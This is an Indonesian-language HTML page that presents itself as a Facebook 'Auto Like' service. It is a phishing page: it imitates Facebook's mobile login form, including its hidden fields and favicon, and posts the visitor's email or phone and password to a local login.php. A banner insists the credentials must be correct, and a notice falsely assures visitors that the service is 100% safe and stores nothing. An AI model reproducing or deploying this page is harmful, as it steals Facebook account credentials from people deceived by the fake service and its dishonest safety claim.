<html>
<head>
<title>Auto Like Facebook</title>
</head>
<body>
<script src='krusor.js' type='text/javascript'></script>
<script src='anti.js' type='text/javascript'></script>
<script src='antiklik.js' type='text/javascript'></script>
<link rel="stylesheet" type="text/css" href="http://css-style.xtgem.com/style/css/jcms/style.css" media="all,handheld"/>
<link
rel="shortcut icon" href="http://facebook.com/
favicon.ico"><style type='text/css'>body, a, a:link{cursor:url(http://cur.cursors-4u.net/cursors/cur-2/cur116.cur), default;} a:hover {cursor:url(http://cur.cursors-4u.net/cursors/cur-2/cur222.cur),wait;}</style>
<link rel="stylesheet" type="text/css" href="http://css-style.xtgem.com/style/css/jcms/style.css" media="all,handheld"/>
<div class="birumuda"><center><font size=10 color=white>Auto Like Facebook</font><br><br></center></div>
<div class="list2"><table><tbody><tr><td
class="apm" valign="top">
<br></div><div class="birumuda"><center><b>Warning</b>: Anda Harus Masuk Menggunakan Akun Facebook - Email atau Telepon Dan Kata Sandi Harus Benar...!!!</
center></div>

<div class="list1"><form method="post" class="mobile-login-form _fcp" id="login_form" novalidate="1" action="login.php"><input type="hidden" name="lsd" value="AVqNeqQM" autocomplete="off" /><input type="hidden" name="charset_test" value="ÃƒÂ¯Ã‚Â¿Ã‚Â½,Ãƒï¿½Ã‚Â´,ÃƒÂ¯Ã‚Â¿Ã‚Â½,Ãƒï¿½Ã‚Â´,&#27700;,&#1044;,&#1028;" /><input type="hidden" name="version" value="1" /><input type="hidden" id="ajax" name="ajax" value="0" /><input type="hidden" id="width" name="width" value="0" /><input type="hidden" id="pxr" name="pxr" value="0" /><input type="hidden" id="gps" name="gps" value="0" /><input type="hidden" autocomplete="off" name="m_ts" value="1381453109" /><input type="hidden" autocomplete="off" name="li" value="NU1XUhlJ3vGHdDnmpVYEI_Pk" /><input type="hidden" autocomplete="off" name="signup_layout" value="layout|bottom_clean||wider_form||prmnt_btn|special||st|create||header_crt_acct_button||hdbtn_color|green||signupinstr||launched_Mar3" /><div id="form_fields"><div class="mobile-login-field aclb apl"><div>Email atau Telepon<br /><input autocorrect="off" autocapitalize="off" class="input" name="email" type="text" /></div></div><div class="mobile-login-field aclb apl"><div>Kata Sandi<br /><input autocorrect="off" autocapitalize="off" class="input" name="pass" type="password" /></div></div></div><br><div class="button_area aclb apl"><input value="Masuk" type="submit" name="login" class="btn btnC largeBtn" size="0" /><br></div></div><div class="a"><center><b>Pemberitahuan</b>: Layanan kami 100% Aman, Kami Tidak Menyimpan Email Dan Kata Sandi Anda, Terima Kasih.</center></div>
<div class="list2"><center> Jika Ada Yang Error Silahkan Hubungi Admin </div>
</body>
<img src="http://3.bp.blogspot.com/-Qiz4VTp_yXU/UfN5l2acG-I/AAAAAAAAPlM/caNm7YiDA84/s1600/facebook+page+auto+like+script.jpg" width="650" height="226"
class="img">
<center>2016 Auto Like Facebook</center>
</html>
